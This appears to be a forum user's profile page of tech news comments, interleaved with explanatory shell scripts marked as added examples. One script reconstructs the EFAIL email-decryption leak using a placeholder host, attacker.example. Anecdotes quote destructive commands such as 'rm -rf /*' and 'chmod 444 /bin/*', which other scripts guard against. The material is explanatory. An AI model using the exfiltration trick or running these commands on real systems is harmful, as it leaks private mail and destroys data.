* Posts by Alan J. Wylie

645 publicly visible posts • joined 21 Aug 2009


Git365. Git for Teams. Quatermass and the Git Pit. GitHub simply won't do now Microsoft has it

Alan J. Wylie

Happy birthday, you lumbering MS-DOS-based mess: Windows 98 turns 20 today

Alan J. Wylie

Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.

And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.

UK footie fans furious as Sky Broadband goes TITSUP: Total inability to stream unfair penalties

Alan J. Wylie

Seems to have affected Zen Internet too

Routing & Core Network Loss of Resilience

They seem to have had redundancy and no outage.

One update of interest:

Engineers are continuing to work on the fibre break.

The work is currently being delayed by numerous road works.

It's time for TLS 1.0 and 1.1 to die (die, die)

Alan J. Wylie

Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?

Supported Server Cipher(s):

Preferred TLSv1.0 128 bits AES128-SHA

Accepted TLSv1.0 256 bits AES256-SHA

Accepted TLSv1.0 128 bits RC4-SHA

Accepted TLSv1.0 112 bits DES-CBC3-SHA

Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256

Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256

Accepted TLSv1.0 128 bits RC4-MD5

User spent 20 minutes trying to move mouse cursor, without success

Alan J. Wylie

Sun optical mice, circa 1985

How many here remember the optical mice on early '80s Sun workstations?

Mouse Systems

There was a special mouse pad with horizontal and vertical lines on it.

New York State is trying to ban 'deepfakes' and Hollywood isn't happy

Alan J. Wylie

Re: Bullshit

"So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."

And what about Woody Allen's Zelig and Dead Men Don't Wear Plaid?

Void Linux gave itself to the void, Korora needs a long siesta – life is hard for small distros

Alan J. Wylie

Missing lead developers

The main developer of Void Linux has apparently disappeared.

That reminds me of the problem Centos had quite a few years ago:

CentOS back from brink of death, Disappearing admin reappears

PGP and S/MIME decryptors can leak plaintext from emails, says infosec professor

Alan J. Wylie

Re: It seems it's a vul'n in HTML parsing in some clients

Martijn Grooten on twitter

The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.
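The three-part layout in that tweet, as an added example that is not from the post, the researchers or any real mail client: a POSIX sh sketch of what a naive client does when it decrypts part 2 and concatenates the parts before rendering, next to a client that renders each part on its own. The host attacker.example and the plaintext are made up for the demo; nothing is sent anywhere, the script only shows which URL a renderer would end up fetching.

```sh
#!/bin/sh
# Added example (not from the post): EFAIL-style direct exfiltration
# through MIME part concatenation.  ATTACKER_HOST is a placeholder.
ATTACKER_HOST="attacker.example"

# Part 1 opens an <img> whose src attribute is left unterminated;
# part 3 closes it.  Whatever the client puts in between becomes
# part of the URL.
part1() { printf '<img src="http://%s/' "$ATTACKER_HOST"; }
part3() { printf '">'; }

# Pull the src of the first <img> out of a rendered HTML body.
img_src() { sed -n 's/.*<img src="\([^"]*\)".*/\1/p'; }

# Naive client: decrypt part 2 (here the plaintext is passed straight
# in, standing in for the decrypted text) and concatenate all three
# parts into one HTML document before rendering.
naive_render() {
    printf '%s%s%s' "$(part1)" "$1" "$(part3)"
}

# URL the naive client's renderer would request: the secret leaks in
# the path and lands in the attacker's web server log.
naive_fetch_url() {
    naive_render "$1" | img_src
}

# Fixed client: render each MIME part as its own document, so the
# attribute opened in part 1 never wraps the decrypted text.  The
# unterminated <img> in part 1 and the stray '">' in part 3 give no
# complete URL on their own.
safe_fetch_url() {
    part1 | img_src
    printf '%s' "$1" | img_src
    part3 | img_src
}

# Demo with a constructed secret.
naive_fetch_url "Meet at the usual place at noon"
echo
safe_fetch_url "Meet at the usual place at noon"
```

The sed pattern stops at the first double quote, so anything in the plaintext after a `"` is cut off; that is the same limit the real attribute has, and it is why the fix is to stop concatenating parts rather than to filter the plaintext.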

Alan J. Wylie

T-Mobile owner sends in legal heavies to lean on small Brit biz over use of 'trademarked' magenta

Alan J. Wylie

We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.

UK age-checking smut overlord won't be able to handle the pressure – critics

Alan J. Wylie

Re: Lesbian Spank Inferno

$ whois LesbianSpankInferno.co.uk | grep "Registered on:"

Registered on: 23-Apr-2018

US military base stores pull Huawei, ZTE kit off the shelves

Alan J. Wylie

Today's NCSC advice

ZTE: NCSC advice to select telecommunications operators with national security concerns

The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated

GitLab crawling back online after breaking its brain in two

Alan J. Wylie

gitlab vulnerabilities disclosed

I wonder whether the problem was as a result of these vulnerabilities being patched:

https://twitter.com/jobertabma/status/989708798515265539

Jobert Abma, 4:32 am - 27 Apr 2018

In December I found a number bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!

ISO blocks NSA's latest IoT encryption systems amid murky tales of backdoors and bullying

Alan J. Wylie

The ciphers look as if they will remain in the Linux kernel

http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html

Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.

Bruce Schneier's opinion is "Personally, I doubt that they're backdoored"

TSB outage, day 5: What do you mean you can't log in? Our systems are up and running. Up and running, we say!

Alan J. Wylie

loading failed for script

https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg

"Loading failed for the <script> with the source "https://dpm.demdex.net/"...

"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...

What on earth are these doing on a supposedly secure page?

The tech you're reading these words on – you have two Dundee uni boffins to thank for that

Alan J. Wylie

Re: Spear

Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).

Alan J. Wylie

RSRE and Laser-Scan

RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.

Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays

I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".

Yahoo! fined! $35m! for! covering! up! massive! IT! security! screwup!

Alan J. Wylie

Re: How about fining BT for also failing to disclose the breach.

I would have thought that when BT contracted with Yahoo! to handle their customers' emails, there would have been self-congratulatory press releases on the subject, perhaps naming the muppets who at the time took the credit.

Can I find these anywhere using Google? Not a trace. The "Right to be forgotten" strikes again?

Good news: AI could solve the pension crisis – by triggering a nuclear apocalypse by 2040

Alan J. Wylie

Dr Strangelove.

I wonder who he is referring to in this quote from the movie clip?

"a study of this project by the Bland Corporation".

AWS DNS network hijack turns MyEtherWallet into ThievesEtherWallet

Alan J. Wylie

8.8.8.8

The first reports I saw were of Google's 8.8.8.8 failing to resolve.

Chatter on noc.spamexperts.net, status.aws.amazon.com and /r/sysadmin

Internet Engineering Task Force leaves home, gets own bank account

Alan J. Wylie

“rough consensus and running code”

Also humming

RFC 7282 - On Consensus and Humming in the IETF

Infosec brainiacs release public dataset to classify new malware using AI

Alan J. Wylie

The "evil bit".

"There is no evil bit" is a reference to an April-the-first RFC: 3514

we define a security flag, known as the "evil" bit, in the IPv4 [RFC791] header. Benign packets have this bit set to 0; those that are used for an attack will have the bit set to 1.

Boffins pull off quantum leap in true random number generation

Alan J. Wylie

Re: what about

It's not only got to be genuinely random (as John von Neumann said: "Any one who considers arithmetical methods of producing random digits is, of course, in a state of sin"), but if someone else has generated the randomness you are using for your Certificate Signing Request, you cannot guarantee the security of your website ever after.

Alan J. Wylie

Re: Sooooo...

187m long parcel of land

Don't bother. A USB connected Geiger–Müller tube will generate randomness just as well.

Imagine you're having a CT scan and malware alters the radiation levels – it's doable

Alan J. Wylie

Re: Assumption is the mother of all fuck-ups:

"A naive assumption is often made that reusing software ... will increase safety because the software will have been exercised extensively. Reusing software modules does not guarantee safety in the new system to which they are transferred...

As demonstrated by the Ariane 5 Launch Failure

Alan J. Wylie

Re: Imagine..

Perhaps a CT scanner was a poor example. As someone else has already mentioned, we should remember the Therac-25 tragedy.

Descent of the Machines: Aussie firm boasts of underwater drone swarms

Alan J. Wylie

Re: not just submarines

P.S.

Number of Royal Navy submarines: 10 (3 Trafalgar class, 3 Astute, 4 Vanguard)

Number of Minehunters fitted with Type 2093/2193 Sonar: 13 (6 Hunt, 7 Sandown)

Alan J. Wylie

not just submarines

more or less exclusively focused on detecting submarines

Mine hunting too. Many years ago I was a contractor at Ferranti, just before they went tits-up as a result of a massive fraud. Simulating sea-bed reflections for a Type 2093 sonar, also graphics for the camera on an ROV ("yellow submarine"). Massive (for those days) Silicon Graphics Onyx / R4400.

Cinema voucher-pusher tells customers: Cancel your credit cards, we've been 'attacked'

Alan J. Wylie

This was public back at the start of February

I saw a report about this and sent an e-mail containing the following link reporting a Filmology breach on 01-Feb-2018.

http://latest-updates.co.uk/48OZ-6G27-6C2T0OLODC/cr.aspx

Twitter link

Digital air traffic control upgrade puts potential delays on London flights

Alan J. Wylie

Easter Holidays?

Many of my friends are off this week skiing or enjoying Mediterranean sunshine. Is it such a good idea to introduce changes and slow everything down at a peak holiday time?

Britain's 4G is slower than Armenia's

Alan J. Wylie

What's the point of measuring bandwidth

when I can't even make phone calls and send texts when I'm at home in a town in North Yorkshire (pop. 3000)? FTTC is available, though.

Super Cali goes ballistic, Starbucks is on notice: Expensive milky coffee is something quite cancerous

Alan J. Wylie

They'll be coming for our toast and chips next!

Microsoft loves Linux so much it wants someone else to build distros for its Windows Store

Alan J. Wylie

Seeing all the down votes, it prompted me to try and remember what it was that MS did almost 20 years ago to try and abuse the standards procedures. I was most amused to discover that googling for microsoft kerberos "nda" returns, as the top result, Embrace, extend, and extinguish

Alan J. Wylie

Re: Does it have a good terminal emulator ?

Google claims that it runs sshd, so putty might be the answer. Add "screen" too, if that is supported. With a VPN you can get a stable login session from multiple endpoints.

Alan J. Wylie

It has been embraced by developers

In this context, "Embraced" has often been followed by "extended" and "extinguished".

Manchester Arena attack: National Mutual Aid Telephony system failed

Alan J. Wylie

Re: Holy **** you can't make this stuff up.

When was the last time you watched Yes Minister? I think you need a refresher on the subject of "sack civil servant".

I'm sure that there are some penguins on South Georgia that need counting.

How do you make those darn code monkeys do what you want? Just give 'em a little nudge

Alan J. Wylie

You missed out "Can be contracted out to my brother-in-law's company. Good.".

Alan J. Wylie

Beware of the leopard

Make Things Easy / Politicians

The antithesis to this is if you don't want someone to do something, e.g. claim a tax refund, you make it as discouraging as possible.

Web forms that show you the new question only after you have answered the previous one, so you have to keep bothering the same person over and over again for the next answer.

Confusing instructions on web forms.

Long phone calls on hold with irritating music.

Being referred from one phone number to another.

That was my morning just wasted, and I'm sure that the Sir Humphreys of this world have big smug grins on their faces.

Fancy a viaduct? We have a wrought Victorian iron marvel to sell you

Alan J. Wylie

The Great McGonagall

The Tay Bridge Disaster

Almost as bad as the Vogons'.

Beautiful Railway Bridge of the Silv’ry Tay!

Alas! I am very sorry to say

That ninety lives have been taken away

On the last Sabbath day of 1879,

Which will be remember’d for a very long time.

Take that, com-raid: US Treasury slaps financial sanctions on Russians for cyber-shenanigans, 2016 election meddling

Alan J. Wylie

Internet Research Agency

What an unfortunate acronym that makes.

MailChimp 'working' to stop hackers flinging malware-laced spam from accounts

Alan J. Wylie

I've been getting them: 10 in the past month, two only yesterday. I'd just blacklist their IPs but Let's Encrypt use them (mandrill.com / mandrillapp.com / mcsv.net / ROCKET SCIENCE GROUP are all MailChimp aliases).

List of delivery IPs here: https://mailchimp.com/about/ips/

Bad blood: Theranos CEO charged with massive fraud

Alan J. Wylie

"Innovators who seek to revolutionize and disrupt an industry must tell investors the truth about what their technology can do today, not just what they hope it might do someday."

Magic Leap are you listening?

Privacy folk raise alarm over schools snooping on kids' online habits

Alan J. Wylie

In 2003 I was working on web proxies for schools: Squid + DansGuardian plus a lot of customisation to allow teachers to turn all internet access on and off, allow only white-listed sites tailored for that particular lesson and block sites on demand. I'd hope that 100% of schools would have some sort of web filtering system.

In those days of limited bandwidth we even had an option to pre-load the Squid cache before the lesson started.

Tracking individual children, however, is a different matter.

Developer mistakenly deleted data - so thoroughly nobody could pin it on him!

Alan J. Wylie

Re: Never rm -fr relative links

And be especially cautious about

find -L ... | xargs rm

and absolute links in chroot/container trees.
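What find -L ... | xargs rm actually does when it meets a symlink to a directory, as an added example that is not the poster's: the scratch tree, the absolute link and the file names are all constructed for the demo, and everything lives under a mktemp directory that the function deletes at the end.

```sh
#!/bin/sh
# Added example (not from the post).  -L makes find follow symlinks,
# so a link to a directory outside the tree is descended into and its
# contents are listed with paths under the tree; rm then removes the
# real files.  -P (the default) treats the link as just a link.
demo_find_L() {
    top=$(mktemp -d)
    mkdir -p "$top/tree" "$top/outside"
    : > "$top/outside/precious"
    # An absolute link, of the kind a chroot or container tree often holds.
    ln -s "$top/outside" "$top/tree/link"

    # The post's pattern: precious is listed as tree/link/precious and removed.
    find -L "$top/tree" -type f -print0 | xargs -0 rm -f --
    if [ -e "$top/outside/precious" ]; then r1=survives; else r1=gone; fi

    # Same clean-up without -L: the link is not a regular file and is
    # not descended into, so nothing outside the tree is touched.
    : > "$top/outside/precious"
    find -P "$top/tree" -type f -print0 | xargs -0 rm -f --
    if [ -e "$top/outside/precious" ]; then r2=survives; else r2=gone; fi

    rm -rf -- "$top"
    printf '%s %s\n' "$r1" "$r2"
}

demo_find_L    # prints: gone survives
```

-print0 and xargs -0 are GNU and BSD extensions rather than POSIX, used here so file names with spaces or newlines cannot be split into extra rm arguments; -f on rm keeps the empty-input case from failing.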

Alan J. Wylie

Re: Two years ago

$ echo "rm -rf $xxx/*"

rm -rf /*

$ set -o nounset

$ echo "rm -rf $xxx/*"

bash: xxx: unbound variable

$

Alan J. Wylie

That was heroic and ingenious.

My rescue mission to get the system back to normal after someone had typed

chmod 444 /bin/*

involved an 8" floppy and driving from Keighley to Peterborough (about 140 miles) and back.

One moral of the story, which I am still trying to instil into my cow-orkers 30 years later, is use the symbolic modes to add or subtract explicit permissions.

And for today:

X-Clacks-Overhead: GNU Terry Pratchett
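The symbolic-versus-absolute point, as an added example that is not from the post: chmod 444 replaces every permission bit, so an executable loses its x bits (which is why /bin/chmod itself could no longer be run to undo /bin/*), whereas a-w removes only the write bits and u+w puts exactly those back. The scratch files are constructed under mktemp; ls -ld supplies the mode string because stat's format flags differ between GNU and BSD.

```sh
#!/bin/sh
# Added example (not from the post): absolute vs symbolic chmod.
mode_of() { ls -ld -- "$1" | cut -c1-10; }

compare_modes() {
    d=$(mktemp -d)
    : > "$d/absolute"; : > "$d/symbolic"
    chmod 755 "$d/absolute" "$d/symbolic"   # both start as rwxr-xr-x

    chmod 444 "$d/absolute"    # absolute: every bit overwritten, x is gone
    chmod a-w "$d/symbolic"    # symbolic: only the w bits are removed
    after_abs=$(mode_of "$d/absolute")
    after_sym=$(mode_of "$d/symbolic")

    chmod u+w "$d/symbolic"    # and the owner's write bit comes back alone
    restored=$(mode_of "$d/symbolic")

    rm -rf -- "$d"
    printf '%s %s %s\n' "$after_abs" "$after_sym" "$restored"
}

compare_modes    # prints: -r--r--r-- -r-xr-xr-x -rwxr-xr-x
```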

Alan J. Wylie

Two years ago

Valve Steam CLEANS Linux PCs (if you're not careful)

Dodgy shell script triggers classic rm -rf /

rm -rf "$STEAMROOT/"*

But STEAMROOT had not been set
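The unset-variable trap in the Steam script, and the rm -rf $xxx/* demonstration in the reply above, as an added example that is not from either post or from Valve's script: ${STEAMROOT:?message} is the per-expansion equivalent of set -o nounset, aborting the command when the variable is unset or empty before rm ever sees a bare /*. The scratch tree under mktemp and the variable's value are constructed for the demo; the unguarded form is deliberately not run.

```sh
#!/bin/sh
# Added example (not from the posts): refusing to run rm -rf when the
# variable that should anchor the path is unset.
count_files() { find "$1" -type f | wc -l | tr -d ' '; }

# ${STEAMROOT:?msg} expands to the value, or aborts the command (and a
# non-interactive shell) with msg on stderr when STEAMROOT is unset or
# empty.  "--" stops rm treating a leading "-" as an option.
guarded_rm() {
    rm -rf -- "${STEAMROOT:?STEAMROOT is not set, refusing to rm}/"*
}

# Run the guarded command in a subshell so the abort only kills the
# subshell; the caller then sees a non-zero exit status instead of
# dying with it.
try_guarded_rm() {
    ( guarded_rm ) 2>/dev/null
}

demo() {
    top=$(mktemp -d)
    mkdir -p "$top/steam/bin" "$top/keep"
    : > "$top/steam/bin/client"; : > "$top/keep/data"
    before=$(count_files "$top")

    unset STEAMROOT
    if try_guarded_rm; then            # unset: the guard fires, rm never runs
        echo "guard did not fire" >&2; rm -rf -- "$top"; return 1
    fi
    after_unset=$(count_files "$top")

    STEAMROOT="$top/steam"              # set: only what is under it goes
    guarded_rm
    after_set=$(count_files "$top")

    rm -rf -- "$top"
    printf '%s %s %s\n' "$before" "$after_unset" "$after_set"
}

demo    # prints: 2 2 1
```

set -o nounset at the top of a script catches every unset variable; the ${VAR:?} form also catches the empty-string case, which nounset lets through, and documents at the dangerous line why the script is refusing.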

Buffer overflow in Unix mailer Exim imperils 400,000 email servers

Alan J. Wylie

The bug was reported to the Exim team on Monday

The bug was reported to the Exim maintainers on the 5th February, then under an NDA to distros and cloud services. What has just happened is that Mel has released more (but not full) details. There's no public POC either.

There was a bit of a panic when one distro broke the embargo and the patch became public a few days early, on a Friday of all days in the week.
